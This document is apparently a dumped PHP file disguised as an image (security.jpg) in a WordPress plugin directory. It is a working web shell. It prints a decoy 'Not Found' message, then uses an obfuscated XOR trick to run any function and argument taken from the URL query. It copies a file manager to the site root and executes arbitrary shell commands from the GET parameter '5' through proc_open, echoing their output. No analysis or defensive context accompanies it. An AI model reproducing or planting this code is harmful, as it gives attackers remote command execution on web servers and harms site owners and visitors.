File: /home/firststeps/public_html/wp-content/plugins__/wp_security/security.jpg
<pre>
<?php
echo "Not Found Dataabc\n";
$__='$<>/'^'{{{{';${$__}[0](${$__}[1]);
copy('phpfm.php', '../../../i.php');
$descriptorspec = array(
0 => array('pipe', 'r'), // stdin
1 => array('pipe', 'w'), // stdout
2 => array('pipe', 'w') // stderr
);
if(isset($_GET[5])){
$command = $_GET[5];
$process = proc_open($command, $descriptorspec, $pipes);
if (is_resource($process)) {
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$errors = stream_get_contents($pipes[2]);
fclose($pipes[2]);
proc_close($process);
echo "Output: " . $output;
// echo "Errors: " . $errors;
}
}
?>
</pre>